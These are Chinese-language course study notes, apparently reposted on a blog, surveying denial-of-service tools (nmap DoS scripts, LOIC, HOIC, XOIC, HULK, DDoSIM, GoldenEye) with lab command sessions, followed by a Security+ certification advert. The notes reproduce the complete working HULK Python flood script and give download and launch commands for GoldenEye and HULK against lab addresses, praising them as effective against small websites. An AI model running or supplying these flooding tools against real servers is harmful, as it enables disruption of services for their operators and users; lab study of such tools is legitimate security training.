您的位置:首页 > 编程语言 > Go语言

【安全牛学习笔记】拒绝服务攻击工具-NMAP、匿名者拒绝服务工具包(匿名者发布的DoS工具)、其他拒绝服务工具-XOIC、HULK、DDOSIM、GoldenEye

2017-10-17 18:10 549 查看
拒绝服务攻击工具                                                  

Nmap                                                               

    - grep dos /usr/share/nmap/scripts/script.db | cut -d "\"" -f 2
root@K:~# cd /usr/share/nmap/scripts/

root@K:/usr/share/nmap/scripts# cat script.db | more

root@K:/usr/share/nmap/scripts# cat scirpt.db | grep dos

root@K:/usr/share/nmap/scripts# nmap -p445 --script=smb-vuln-regsvc-dos.nse 192.168.1.1

Starting Nmap 7.12 ( https://nmap.org ) at 2016-07-05 08:08 EDT

Nmap scan report for 192.168.1.1

Host is up (0.0037s latency).

PORT    STATE    SERVICE

445/tcp filtered microsoft-ds

MAC Address: 14:75:90:21:4f:56 (Tp-link Technologies)

Nmap done: 1 IP address (1 host up) scanned in 0384 seconds
匿名者拒绝服务工具包        

匿名者发布的Dos工具         

    - LOIC                  

    - HOIC                  

    - DDoSer                

招募志愿者发放以上工具      

以上Dos工具不隐藏真是IP地址
卢瓦(LOIC) (Low Orbit Ion Canon)

LOTC是一个最受欢迎的DOS攻击工具。 这个工具被去年流行的黑客集团匿名者用于对许多大公司的网络攻击。 

它可以通过使用单个用户执行DOS攻击小型服务器,工具非常易于使用,即便你是一个初学者。 这个工具执行DOS攻击通过发送UDP,TCP或HTTP请求到受害者服务器。 你只需要知道服务器的IP地址或URL,其他的就交给这个工具吧

低轨道离子炮(LOIC)是一个开源的网站压力测试和抗拒绝服务测试工具,由C#语言开发。最初LOIC由Praetox科技开发,目前由开源社区维护。LOIC可以通过TCP或UDP洪水的方式形成拒绝服务攻击(DoS),因而可能打断业务正常运行,安全和测试人员在做评估网站压力测试时,请谨慎使用。 使用教程我记得我发过了自己在吧里找吧。

LOTC可以在linux系统上运行

HOIC不能再linux运行,能在windows运行

root@K:~# ifconfig

192.168.1.116

msfadmin@metasploitable:~$ ifconfig

192.168.1.119

HOIC不能再linux运行,能在windows运行
其他拒绝服务工具                                        

XOIC                                                   

    - 攻击任意IP地址的指定端口                          

    - git clone://git.code/sf.net/p/xoic/code xoic-code

    - http://xoicdoser.wordpress.com/                   

    - 三种模式:test、normal、Dos Attack                

    - 支持协议:TCP/HTTP/UDP/ICMP
- git clone://git.code/sf.net/p/xoic/code xoic-code,这个下载链接已经空了,不能下载,另外找下载地址!

XOIC官网地址:http://xoicdoser.wordpress.com/,此链接里面的软件有恶意代码,建议不要下载!

XOIC是另一个不错的DOS攻击工具。它根据用户选择的端口与协议执行DOS攻击任何服务器。XOIC开发者还声称XOIC比上面的LOIC在很多方面更强大呢。  

一般来说,该工具有三种攻击模式,第一个被称为测试模式,是非常基本的; 第二个是正常的DOS攻击模式; 最后一个是带有HTTP / TCP / UDP / ICMP消息的DOS攻击模式,。 

对付小型网站来说,这是一个很有效的DDOS工具。 但是从来没有尝试的要小心点,你可能最终会撞自己的网站的服务器。 

下载地址:https://sourceforge.net/projects/xoic/
其他拒绝服务工具                                                   

HULK - Http Unbearable Load King                                   

    - Python脚本                                                   

    - 随机产生大量唯一的地址请求,避免缓存命中                      

    - 耗尽WEB服务器资源池                                          

    - https://packetstormsecurity.com/files/download/112856/hulk.zip
下载地址:https://github.com/grafov/hulk

Hulk DoS tool 

Hulk DoS tool 移植到Python语言。原来的Python工具由巴里Shteiman 
http://www.sectorix.com/2012/05/17/hulk-web-server-dos-tool/
我只是移植的实用程序是快速和肮脏的。原函数的名字是保持和原来的逻辑大多保持太。次要功能添加:

您可以设置用于请求的自定义线程数

还设置了程序(好的去功能)所使用的内核的数量

程序正确杀掉Ctl+C

此工具针对性的负载测试,并可能真的很糟糕配置的服务器。明智地使用它。

实例

$ hulk -site http://example.com/test/ 2>/dev/null

$ HULKMAXPROCS=4096 hulk -site http://example.com 2>/tmp/errlog

有用的环境变量:

它设置为你的CPU GOMAXPROCS或更高一些。

hulkmaxprocs限制连接池(默认为1024)。创建高负载使用更高的价值。

更多细节:http://siberian.laika.name/node/7

许可证

亚力山大一grafov grafov@gmail.com版权

原绿巨人实用权威巴里Shteiman(http:/ / sectorix。com)。没有任何引用许可源比它不是GPL。问作者关于许可证的原始效用。

走巨人牌工具版本。看到许可证。

# ----------------------------------------------------------------------------------------------

# HULK - HTTP Unbearable Load King

#

# this tool is a dos tool that is meant to put heavy load on HTTP servers in order to bring them

# to their knees by exhausting the resource pool, its is meant for research purposes only

# and any malicious usage of this tool is prohibited.

#

# author :  Barry Shteiman , version 1.0

# ----------------------------------------------------------------------------------------------

import urllib2

import sys

import threading

import random

import re

#global params

url=''

host=''

headers_useragents=[]

headers_referers=[]

request_counter=0

flag=0

safe=0

def inc_counter():

global request_counter

request_counter+=1

def set_flag(val):

global flag

flag=val

def set_safe():

global safe

safe=1

# generates a user agent array

def useragent_list():

global headers_useragents

headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')

headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')

headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')

headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')

headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')

headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')

headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729;
.NET CLR 3.0.30729)')

headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')

headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')

headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')

headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')

headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')

return(headers_useragents)

# generates a referer array

def referer_list():

global headers_referers

headers_referers.append('http://www.google.com/?q=')

headers_referers.append('http://www.usatoday.com/search/results?q=')

headers_referers.append('http://engadget.search.aol.com/search?q=')

headers_referers.append('http://' + host + '/')

return(headers_referers)

#builds random ascii string

def buildblock(size):

out_str = ''

for i in range(0, size):

a = random.randint(65, 90)

out_str += chr(a)

return(out_str)

def usage():

print '---------------------------------------------------'

print 'USAGE: python hulk.py <url>'

print 'you can add "safe" after url, to autoshut after dos'

print '---------------------------------------------------'

#http request

def httpcall(url):

useragent_list()

referer_list()

code=0

if url.count("?")>0:

param_joiner="&"

else:

param_joiner="?"

request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10)))

request.add_header('User-Agent', random.choice(headers_useragents))

request.add_header('Cache-Control', 'no-cache')

request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')

request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10)))

request.add_header('Keep-Alive', random.randint(110,120))

request.add_header('Connection', 'keep-alive')

request.add_header('Host',host)

try:

urllib2.urlopen(request)

except urllib2.HTTPError, e:

#print e.code

set_flag(1)

print 'Response Code 500'

code=500

except urllib2.URLError, e:

#print e.reason

sys.exit()

else:

inc_counter()

urllib2.urlopen(request)

return(code)

#http caller thread 

class HTTPThread(threading.Thread):

def run(self):

try:

while flag<2:

code=httpcall(url)

if (code==500) & (safe==1):

set_flag(2)

except Exception, ex:

pass

# monitors http threads and counts requests

class MonitorThread(threading.Thread):

def run(self):

previous=request_counter

while flag==0:

if (previous+100<request_counter) & (previous<>request_counter):

print "%d Requests Sent" % (request_counter)

previous=request_counter

if flag==2:

print "\n-- HULK Attack Finished --"

#execute 

if len(sys.argv) < 2:

usage()

sys.exit()

else:

if sys.argv[1]=="help":

usage()

sys.exit()

else:

print "-- HULK Attack Started --"

if len(sys.argv)== 3:

if sys.argv[2]=="safe":

set_safe()

url = sys.argv[1]

if url.count("/")==2:

url = url + "/"

m = re.search('http\://([^/]*)/?.*', url)

host = m.group(1)

for i in range(500):

t = HTTPThread()

t.start()

t = MonitorThread()

t.start()

--------------------------------------------------------------------------------------

root@k:~# cd Desktop

root@k:~/Desktop# python hulk.py

----------------------------------------------------

USAGE: python hulk.py <url>

you can add "safe" affter url, to autoshut after dos

----------------------------------------------------

root@k:~/Desktop# python hulk.py http://192.168.1.119
其他拒绝服务工具                            

DDoSIM                                      

    - 7层拒绝服务工具(模拟多个僵尸机)     

    - 随机IP地址                            

    - 基于TCP连接的攻击                     

    - 应用层DDoS攻击                        

    - 正常的HTTP请求、非正常的HTTP请求式DDoS

    - SMTP DDos                             

    - 随机端口的TCP连接洪水
DDOSIM-Layer 

DDOSIM是另一种流行的DOS攻击工具。 顾名思义,它是通过模拟控制几个僵尸主机执行DDOS攻击。所有僵尸主机创建完整的TCP连接到目标服务器。 

这个工具是用c++写的,并且在Linux系统上运行。 

这些是DDOSIM的主要特点: 

模拟几个僵尸攻击 

随机的IP地址 

TCP-connection-based攻击 

应用程序层DDOS攻击 

HTTP DDos等有效的请求 

与无效请求HTTP DDoS(类似于直流+ +攻击) 

SMTP DDoS 

TCP洪水连接随机端口

在这里下载DDOSIM: http://sourceforge.net/projects/ddosim/
其他拒绝服务工具                                                 

GoldenEye                                                        

    - http/https拒绝服务攻击工具                                 

    - 安全研究为目的的Python脚本                                 

    - 随机攻击向量,keep-alive,避免缓存命中                      

    - wget https://github.com/jseidl/GoldenEye/archive/master.zip
    - unzip master.zip                                           

    - ./goldeneye.py http://1.1.1.1 -w 50
黄金眼(GoldenEye )HTTP拒绝服务工具 

黄金眼也是一个简单但有效的DOS攻击工具。 这是在Python测试开发的DOS攻击,但是人们也把它当做一种黑客工具了。

黄金眼

黄金是一个Python应用程序安全测试之用!

黄金是一个HTTP DoS测试工具。

攻击向量的剥削:HTTP keep-alive +非缓存

使用

USAGE: ./goldeneye.py <url> [OPTIONS]

 OPTIONS:

    Flag           Description                     Default

    -u, --useragents   File with user-agents to use                     (default: randomly generated)

    -w, --workers      Number of concurrent workers                     (default: 50)

    -s, --sockets      Number of concurrent sockets                     (default: 30)

    -m, --method       HTTP Method to use 'get' or 'post'  or 'random'  (default: get)

    -d, --debug        Enable Debug Mode [more verbose output]          (default: False)

    -h, --help         Shows this help

公用事业

工具/ getuas.py -切取用户代理列表从http://www.useragentstring.com/pages/useragentstring.php子页面(例如,/ getuas.py http://www.useragentstring.com/pages/browserlist/)需要beautifulsoup4
RES /列表/用户代理文本列表(每行一个)用户代理字符串(从http://www.useragentstring.com)

更新日志

2014-02-20添加随机生成的用户代理(还是RFC标准)。

2014-02-19删除无聊的查阅情况和用户代理。参考改进的随机性。添加外部用户代理列表支持。

2013-03-26从线程处理。仍然有一些错误解决像我还不知道如何propperly关机经理。

2012-12-09初始释放



从对argparse getopt

从字符串。format() printf一样

许可证

本软件是在GNU通用公共许可证3版下的分布式(GPLv3)

法律公告

本软件提供的教育用途!如果你从事任何非法活动,作者不承担任何责任。通过使用这个软件,你同意这些条款。

下载: http://packetstormsecurity.com/files/120966/GoldenEye-HTTP-Denial-Of-Service-Tool.html
root@k:~/Desktop# wget https://github.com/jseidl/GoldenEye/archive/master.zip   //安装黄金眼

root@k:~/Desktop# unzip master.zip    //解压

root@k:~/Desktop# cd GoldenEye-master/

root@k:~/Desktop/GoldenEye-master# ls

goldeneye.py  README.md  res  util

root@k:~/Desktop/GoldenEye-master# python goldeneye.py

Please supply at least the URL

------------------------------------------------------------------------------------------------------

GoldenEye v2.1 by Jan Seidl <jseidl@wroot.org>

 USAGE: ./goldeneye.py <url> [OPTIONS]

 OPTIONS:

 FlagDescription
Default

 -u, --useragentsFile with user-agents to use
(default: randomly generated)

 -w, --workersNumber of concurrent workers
(default: 10)

 -s, --socketsNumber of concurrent sockets
(default: 500)

 -m, --methodHTTP Method to use 'get' or 'post'  or 'random'(default: get)

 -d, --debugEnable Debug Mode [more verbose output]
(default: False)

 -h, --helpShows this help

------------------------------------------------------------------------------------------------------

root@k:~/Desktop/GoldenEye-master# python goldeneye.py http://192.168.1.119 -w 50 -m random

GoldenEye v2.1 by Jan Seidl <jseidl@wroot.org>

Hitting webserver in mode 'random' with 50 workers running 500 connections each. Hit CTRL+C to cancel.

该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂

Security+认证为什么是互联网+时代最火爆的认证?

      牛妹先给大家介绍一下Security+

        Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。

       通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易,含金量较高,目前已被全球企业和安全专业人士所普遍采纳。

Security+认证如此火爆的原因?  

       原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白


      目前行业内受认可的信息安全认证主要有CISP和CISSP,但是无论CISP还是CISSP都是偏重信息安全管理的,技术知识讲的宽泛且浅显,考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上,CISP也要求大专学历4年以上工作经验,这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中,无论是找工作还是升职加薪,或是投标时候报人员,认证都是必不可少的,这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍,由于Security+偏重信息安全技术,所以对工作经验没有特别的要求。只要你有IT相关背景,追求进步就可以学习和考试。

       原因二: IT运维人员工作与翻身的利器。

       在银行、证券、保险、信息通讯等行业,IT运维人员非常多,IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍,死亦写代码”的悲壮,但也有着“锄禾日当午,不如运维苦“的感慨。天天对着电脑和机器,时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识,掌握网络安全实践。职业发展朝着网络安全的方向发展,解决国内信息安全人才的匮乏问题。另外,即使不转型,要做好运维工作,学习安全知识取得安全认证也是必不可少的。

        原因三:接地气、国际范儿、考试方便、费用适中!

CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。

        在目前的信息安全大潮之下,人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的,相信Security+认证一定会成为最火爆的信息安全认证。
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息